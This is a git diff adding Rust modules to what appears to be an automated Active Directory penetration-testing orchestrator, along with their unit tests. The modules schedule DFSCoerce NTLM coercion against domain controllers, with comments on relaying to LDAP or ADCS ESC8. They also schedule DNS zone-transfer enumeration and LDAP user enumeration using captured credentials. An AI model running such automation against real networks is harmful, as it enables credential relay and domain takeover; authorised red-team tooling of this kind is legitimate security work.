+ let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "dacl:vuln-dk-001"); + } + + #[tokio::test] + async fn collect_source_user_fallback_to_from_key() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("svc_account", "contoso.local")); + let mut details = HashMap::new(); + details.insert("from".to_string(), serde_json::json!("svc_account")); + details.insert("target".to_string(), serde_json::json!("victim")); + details.insert( + "source_domain".to_string(), + serde_json::json!("contoso.local"), + ); + let vuln = make_vuln("vuln-from-001", "GenericWrite", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].source_user, "svc_account"); + } + + #[tokio::test] + async fn collect_target_user_fallback_to_target_user_key() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let mut details = HashMap::new(); + details.insert("source".to_string(), serde_json::json!("admin")); + details.insert( + "target_user".to_string(), + serde_json::json!("fallback_target"), + ); + details.insert( + "source_domain".to_string(), + serde_json::json!("contoso.local"), + ); + let vuln = make_vuln("vuln-tu-001", "WriteDacl", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_user, "fallback_target"); + } +} diff --git a/ares-cli/src/orchestrator/automation/dfs_coercion.rs b/ares-cli/src/orchestrator/automation/dfs_coercion.rs new file mode 
100644
index 00000000..ad9bc889
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/dfs_coercion.rs
@@ -0,0 +1,450 @@
+//! auto_dfs_coercion -- trigger DFSCoerce (MS-DFSNM) NTLM coercion against DCs.
+//!
+//! DFSCoerce abuses the MS-DFSNM protocol (Distributed File System Namespace
+//! Management) to force a DC to authenticate to an attacker listener. Unlike
+//! PetitPotam, DFSCoerce requires valid domain credentials but works on
+//! systems where PetitPotam's unauthenticated path has been patched.
+//!
+//! The captured NTLM auth can be relayed to LDAP (shadow creds, RBCD) or
+//! ADCS web enrollment (ESC8).
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect DFS coercion work items from current state.
+///
+/// Pure logic extracted from `auto_dfs_coercion` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_dfs_coercion_work(state: &StateInner, listener: &str) -> Vec<DfsWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for (domain, dc_ip) in &state.all_domains_with_dcs() {
+        if dc_ip.as_str() == listener {
+            continue;
+        }
+
+        let dedup_key = format!("dfs_coerce:{dc_ip}");
+        if state.is_processed(DEDUP_DFS_COERCION, &dedup_key) {
+            continue;
+        }
+
+        let cred = match state
+            .credentials
+            .iter()
+            .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+            .or_else(|| state.credentials.first())
+        {
+            Some(c) => c.clone(),
+            None => continue,
+        };
+
+        items.push(DfsWork {
+            dedup_key,
+            domain: domain.clone(),
+            dc_ip: dc_ip.clone(),
+            listener: listener.to_string(),
+            credential: cred,
+        });
+    }
+
+    items
+}
+
+/// Dispatches DFSCoerce against each DC that hasn't been DFS-coerced.
+/// Interval: 45s.
+pub async fn auto_dfs_coercion(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("dfs_coercion") {
+            continue;
+        }
+
+        let listener = match dispatcher.config.listener_ip.as_deref() {
+            Some(ip) => ip.to_string(),
+            None => continue,
+        };
+
+        let work: Vec<DfsWork> = {
+            let state = dispatcher.state.read().await;
+            collect_dfs_coercion_work(&state, &listener)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "dfs_coercion",
+                "target_ip": item.dc_ip,
+                "domain": item.domain,
+                "listener_ip": item.listener,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("dfs_coercion");
+            match dispatcher
+                .throttled_submit("coercion", "coercion", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        domain = %item.domain,
+                        dc = %item.dc_ip,
+                        "DFSCoerce (MS-DFSNM) coercion dispatched"
+                    );
+
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_DFS_COERCION, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_DFS_COERCION, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(dc = %item.dc_ip, "DFSCoerce task deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch DFSCoerce");
+                }
+            }
+        }
+    }
+}
+
+struct DfsWork {
+    dedup_key: String,
+    domain: String,
+    dc_ip: String,
+    listener: String,
+    credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::orchestrator::state::StateInner;
+    use ares_core::models::Credential;
+
+    fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+        Credential {
+            id: format!("c-{username}"),
+            username: username.into(),
+            password: password.into(), // pragma: allowlist secret
+            domain: domain.into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        }
+    }
+
+    #[test]
+    fn dedup_key_format() {
+        let key = format!("dfs_coerce:{}", "192.168.58.10");
+        assert_eq!(key, "dfs_coerce:192.168.58.10");
+    }
+
+    #[test]
+    fn dedup_set_name() {
+        assert_eq!(DEDUP_DFS_COERCION, "dfs_coercion");
+    }
+
+    #[test]
+    fn skips_self_listener() {
+        let dc_ip = "192.168.58.50";
+        let listener = "192.168.58.50";
+        assert_eq!(dc_ip, listener, "DC IP matching listener should be skipped");
+
+        let dc_ip2 = "192.168.58.10";
+        assert_ne!(dc_ip2, listener, "Different IP should not be skipped");
+    }
+
+    #[test]
+    fn payload_structure_validation() {
+        let cred = ares_core::models::Credential {
+            id: "c1".into(),
+            username: "admin".into(),
+            password: "P@ssw0rd!".into(), // pragma: allowlist secret
+            domain: "contoso.local".into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        };
+
+        let payload = serde_json::json!({
+            "technique": "dfs_coercion",
+            "target_ip": "192.168.58.10",
+            "domain": "contoso.local",
+            "listener_ip": "192.168.58.50",
+            "credential": {
+                "username": cred.username,
+                "password": cred.password,
+                "domain": cred.domain,
+            },
+        });
+
+        assert_eq!(payload["technique"], "dfs_coercion");
+        assert_eq!(payload["target_ip"], "192.168.58.10");
+        assert_eq!(payload["domain"], "contoso.local");
+        assert_eq!(payload["listener_ip"], "192.168.58.50");
+        assert_eq!(payload["credential"]["username"], "admin");
+        assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); //
pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = DfsWork { + dedup_key: "dfs_coerce:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + listener: "192.168.58.50".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "dfs_coerce:192.168.58.10"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.listener, "192.168.58.50"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn self_targeting_prevention() { + let listener = "192.168.58.50"; + let dc_ips = ["192.168.58.10", "192.168.58.50", "192.168.58.20"]; + + let non_self: Vec<&&str> = dc_ips.iter().filter(|ip| **ip != listener).collect(); + + assert_eq!(non_self.len(), 2); + assert!(!non_self.contains(&&"192.168.58.50")); + assert!(non_self.contains(&&"192.168.58.10")); + assert!(non_self.contains(&&"192.168.58.20")); + } + + #[test] + fn domain_extraction_for_credential_match() { + let domain = "contoso.local"; + let cred_domain = "CONTOSO.LOCAL"; + assert_eq!( + cred_domain.to_lowercase(), + domain.to_lowercase(), + "Domain matching should be case-insensitive" + ); + + let domain2 = "fabrikam.local"; + assert_ne!( + cred_domain.to_lowercase(), + domain2.to_lowercase(), + "Different domains should not match" + ); + } + + // --- collect_dfs_coercion_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_dcs_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_dc_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "dfs_coerce:192.168.58.10"); + assert_eq!(work[0].listener, "192.168.58.50"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_dc_matching_listener() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.50".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist 
secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_DFS_COERCION, "dfs_coerce:192.168.58.10".into()); + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_dcs_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "crossuser"); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_DFS_COERCION, "dfs_coerce:192.168.58.10".into()); + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + 
.push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/dns_enum.rs b/ares-cli/src/orchestrator/automation/dns_enum.rs new file mode 100644 index 00000000..8d3e5bc7 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/dns_enum.rs @@ -0,0 +1,398 @@ +//! auto_dns_enum -- DNS zone transfer and record enumeration. +//! +//! Attempts AXFR zone transfers and enumerates DNS records (SRV, A, CNAME) +//! from each discovered DC. DNS records reveal additional hosts, services, +//! and naming conventions that port scanning alone may miss. +//! +//! Zone transfers are often allowed from domain-joined machines, and even +//! when blocked, DNS SRV record enumeration reveals AD-registered services +//! (e.g., _msdcs, _kerberos, _ldap, _gc, _http). + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect DNS enumeration work items from current state. +/// +/// Pure logic extracted from `auto_dns_enum` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_dns_enum_work(state: &StateInner) -> Vec { + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("dns_enum:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_DNS_ENUM, &dedup_key) { + continue; + } + + // DNS enum can work without creds (zone transfer, SRV queries) + // but we pass creds if available for authenticated queries + let cred = state + .credentials + .iter() + .find(|c| !c.password.is_empty() && c.domain.to_lowercase() == domain.to_lowercase()) + .cloned(); + + items.push(DnsEnumWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// DNS enumeration per domain. +/// Interval: 45s. +pub async fn auto_dns_enum(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! 
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("dns_enum") {
+            continue;
+        }
+
+        let work: Vec<DnsEnumWork> = {
+            let state = dispatcher.state.read().await;
+            collect_dns_enum_work(&state)
+        };
+
+        for item in work {
+            let mut payload = json!({
+                "technique": "dns_enumeration",
+                "target_ip": item.dc_ip,
+                "domain": item.domain,
+            });
+
+            if let Some(ref cred) = item.credential {
+                payload["credential"] = json!({
+                    "username": cred.username,
+                    "password": cred.password,
+                    "domain": cred.domain,
+                });
+            }
+
+            let priority = dispatcher.effective_priority("dns_enum");
+            match dispatcher
+                .throttled_submit("recon", "recon", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        domain = %item.domain,
+                        dc = %item.dc_ip,
+                        "DNS enumeration dispatched"
+                    );
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_DNS_ENUM, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_DNS_ENUM, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(domain = %item.domain, "DNS enumeration deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, domain = %item.domain, "Failed to dispatch DNS enumeration");
+                }
+            }
+        }
+    }
+}
+
+struct DnsEnumWork {
+    dedup_key: String,
+    domain: String,
+    dc_ip: String,
+    credential: Option<ares_core::models::Credential>,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn dedup_key_format() {
+        let key = format!("dns_enum:{}", "contoso.local");
+        assert_eq!(key, "dns_enum:contoso.local");
+    }
+
+    #[test]
+    fn dedup_key_normalizes_domain() {
+        let key = format!("dns_enum:{}", "CONTOSO.LOCAL".to_lowercase());
+        assert_eq!(key, "dns_enum:contoso.local");
+    }
+
+    #[test]
+    fn dedup_set_name() {
+        assert_eq!(DEDUP_DNS_ENUM, "dns_enum");
+    }
+
+    #[test]
+    fn no_cred_required() {
+        // DNS enum works without credentials for zone transfer / SRV queries
+        let cred: Option<ares_core::models::Credential> = None;
+        assert!(cred.is_none());
+    }
+
+    #[test]
+    fn payload_without_cred() {
+        let payload = serde_json::json!({
+            "technique": "dns_enumeration",
+            "target_ip": "192.168.58.10",
+            "domain": "contoso.local",
+        });
+        assert!(payload.get("credential").is_none());
+    }
+
+    #[test]
+    fn payload_structure_has_correct_technique() {
+        let payload = serde_json::json!({
+            "technique": "dns_enumeration",
+            "target_ip": "192.168.58.10",
+            "domain": "contoso.local",
+        });
+        assert_eq!(payload["technique"], "dns_enumeration");
+        assert_eq!(payload["target_ip"], "192.168.58.10");
+        assert_eq!(payload["domain"], "contoso.local");
+    }
+
+    #[test]
+    fn payload_with_credential() {
+        let cred = ares_core::models::Credential {
+            id: "c1".into(),
+            username: "admin".into(),
+            password: "P@ssw0rd!".into(), // pragma: allowlist secret
+            domain: "contoso.local".into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        };
+        let mut payload = serde_json::json!({
+            "technique": "dns_enumeration",
+            "target_ip": "192.168.58.10",
+            "domain": "contoso.local",
+        });
+        payload["credential"] = serde_json::json!({
+            "username": cred.username,
+            "password": cred.password,
+            "domain": cred.domain,
+        });
+        assert_eq!(payload["credential"]["username"], "admin");
+        assert_eq!(payload["credential"]["domain"], "contoso.local");
+    }
+
+    #[test]
+    fn work_struct_construction() {
+        let work = DnsEnumWork {
+            dedup_key: "dns_enum:contoso.local".into(),
+            domain: "contoso.local".into(),
+            dc_ip: "192.168.58.10".into(),
+            credential: None,
+        };
+
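+        // credential stays None here: unlike the credentialed automations, DNS
+        // enumeration work items are still produced when no credential exists.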
assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert!(work.credential.is_none()); + } + + #[test] + fn work_struct_with_credential() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = DnsEnumWork { + dedup_key: "dns_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: Some(cred), + }; + assert!(work.credential.is_some()); + assert_eq!(work.credential.unwrap().username, "admin"); + } + + #[test] + fn dedup_key_domain_based() { + let domain1 = "contoso.local"; + let domain2 = "fabrikam.local"; + let key1 = format!("dns_enum:{}", domain1.to_lowercase()); + let key2 = format!("dns_enum:{}", domain2.to_lowercase()); + assert_ne!(key1, key2); + assert_eq!(key1, "dns_enum:contoso.local"); + assert_eq!(key2, "dns_enum:fabrikam.local"); + } + + #[test] + fn case_normalization_mixed() { + let key = format!("dns_enum:{}", "Contoso.Local".to_lowercase()); + assert_eq!(key, "dns_enum:contoso.local"); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_dns_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_no_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert!(work[0].credential.is_none()); + } + + #[test] + fn collect_single_domain_with_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + assert!(work[0].credential.is_some()); + assert_eq!(work[0].credential.as_ref().unwrap().username, "admin"); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.mark_processed(DEDUP_DNS_ENUM, "dns_enum:contoso.local".into()); + let work = collect_dns_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_domains() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_skips_empty_password_cred() { + let mut state = StateInner::new("test-op".into()); + state 
+            .domain_controllers
+            .insert("contoso.local".into(), "192.168.58.10".into());
+        state
+            .credentials
+            .push(make_credential("admin", "", "contoso.local"));
+        let work = collect_dns_enum_work(&state);
+        assert_eq!(work.len(), 1);
+        // Empty password cred should not be selected
+        assert!(work[0].credential.is_none());
+    }
+
+    #[test]
+    fn collect_cred_only_matches_same_domain() {
+        let mut state = StateInner::new("test-op".into());
+        state
+            .domain_controllers
+            .insert("contoso.local".into(), "192.168.58.10".into());
+        state
+            .credentials
+            .push(make_credential("admin", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret
+        let work = collect_dns_enum_work(&state);
+        assert_eq!(work.len(), 1);
+        // Cross-domain cred should NOT be selected (dns_enum only matches same domain)
+        assert!(work[0].credential.is_none());
+    }
+
+    #[test]
+    fn collect_dedup_key_lowercased() {
+        let mut state = StateInner::new("test-op".into());
+        state
+            .domain_controllers
+            .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+        let work = collect_dns_enum_work(&state);
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].dedup_key, "dns_enum:contoso.local");
+    }
+
+    #[tokio::test]
+    async fn collect_via_shared_state() {
+        let shared = SharedState::new("test-op".into());
+        {
+            let mut state = shared.write().await;
+            state
+                .domain_controllers
+                .insert("contoso.local".into(), "192.168.58.10".into());
+            state
+                .credentials
+                .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+        }
+        let state = shared.read().await;
+        let work = collect_dns_enum_work(&state);
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].domain, "contoso.local");
+        assert!(work[0].credential.is_some());
+    }
+}
diff --git a/ares-cli/src/orchestrator/automation/domain_user_enum.rs b/ares-cli/src/orchestrator/automation/domain_user_enum.rs
new file mode 100644
index 00000000..2dda9eb9
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/domain_user_enum.rs
@@ -0,0 +1,436 @@
+//! auto_domain_user_enum -- explicit per-domain LDAP user enumeration.
+//!
+//! Unlike initial recon (which does broad DC scanning), this module dispatches
+//! targeted LDAP user enumeration per domain using the best available credential.
+//! This fills the gap where a trusted domain's users are not enumerated because
+//! the initial recon agent only has primary-domain credentials.
+//!
+//! Dispatches `ldap_user_enumeration` to the recon role for each domain that
+//! has a DC but hasn't been fully enumerated yet.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect user enumeration work items from current state.
+///
+/// Pure logic extracted from `auto_domain_user_enum` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_user_enum_work(state: &StateInner) -> Vec<UserEnumWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for (domain, dc_ip) in &state.all_domains_with_dcs() {
+        let dedup_key = format!("user_enum:{}", domain.to_lowercase());
+        if state.is_processed(DEDUP_DOMAIN_USER_ENUM, &dedup_key) {
+            continue;
+        }
+
+        // Prefer a credential from the target domain.
+        // Fall back to any available credential (cross-domain LDAP may work).
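+        // e.g. with creds [FABRIKAM\jdoe, CONTOSO\admin] and domain contoso.local,
+        // the first pass picks CONTOSO\admin; the fallback would only hand out
+        // FABRIKAM\jdoe if no usable contoso.local credential existed
+        // (hypothetical names).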
+        let cred = match state
+            .credentials
+            .iter()
+            .find(|c| {
+                c.domain.to_lowercase() == domain.to_lowercase()
+                    && !c.password.is_empty()
+                    && !state.is_credential_quarantined(&c.username, &c.domain)
+            })
+            .or_else(|| {
+                state.credentials.iter().find(|c| {
+                    !c.password.is_empty()
+                        && !state.is_credential_quarantined(&c.username, &c.domain)
+                })
+            }) {
+            Some(c) => c.clone(),
+            None => continue,
+        };
+
+        items.push(UserEnumWork {
+            dedup_key,
+            domain: domain.clone(),
+            dc_ip: dc_ip.clone(),
+            credential: cred,
+        });
+    }
+
+    items
+}
+
+/// Dispatches per-domain LDAP user enumeration.
+/// Interval: 45s.
+pub async fn auto_domain_user_enum(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("domain_user_enumeration") {
+            continue;
+        }
+
+        let work: Vec<UserEnumWork> = {
+            let state = dispatcher.state.read().await;
+            collect_user_enum_work(&state)
+        };
+
+        for item in work {
+            let cross_domain = item.credential.domain.to_lowercase() != item.domain.to_lowercase();
+            let mut payload = json!({
+                "technique": "ldap_user_enumeration",
+                "target_ip": item.dc_ip,
+                "domain": item.domain,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+                "filters": ["(objectCategory=person)(objectClass=user)"],
+                "attributes": ["sAMAccountName", "description", "memberOf", "userAccountControl", "servicePrincipalName"],
+            });
+            if cross_domain {
+                payload["bind_domain"] = json!(item.credential.domain);
+            }
+
+            let priority = dispatcher.effective_priority("domain_user_enumeration");
+            match dispatcher
+                .throttled_submit("recon", "recon", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        domain = %item.domain,
+                        dc = %item.dc_ip,
+                        cred_user = %item.credential.username,
+                        "Domain user enumeration dispatched"
+                    );
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_DOMAIN_USER_ENUM, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_DOMAIN_USER_ENUM, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(domain = %item.domain, "Domain user enumeration deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, domain = %item.domain, "Failed to dispatch user enumeration");
+                }
+            }
+        }
+    }
+}
+
+struct UserEnumWork {
+    dedup_key: String,
+    domain: String,
+    dc_ip: String,
+    credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn dedup_key_format() {
+        let key = format!("user_enum:{}", "contoso.local");
+        assert_eq!(key, "user_enum:contoso.local");
+    }
+
+    #[test]
+    fn dedup_set_name() {
+        assert_eq!(DEDUP_DOMAIN_USER_ENUM, "domain_user_enum");
+    }
+
+    #[test]
+    fn payload_structure_has_correct_technique() {
+        let cred = ares_core::models::Credential {
+            id: "c1".into(),
+            username: "admin".into(),
+            password: "P@ssw0rd!".into(), // pragma: allowlist secret
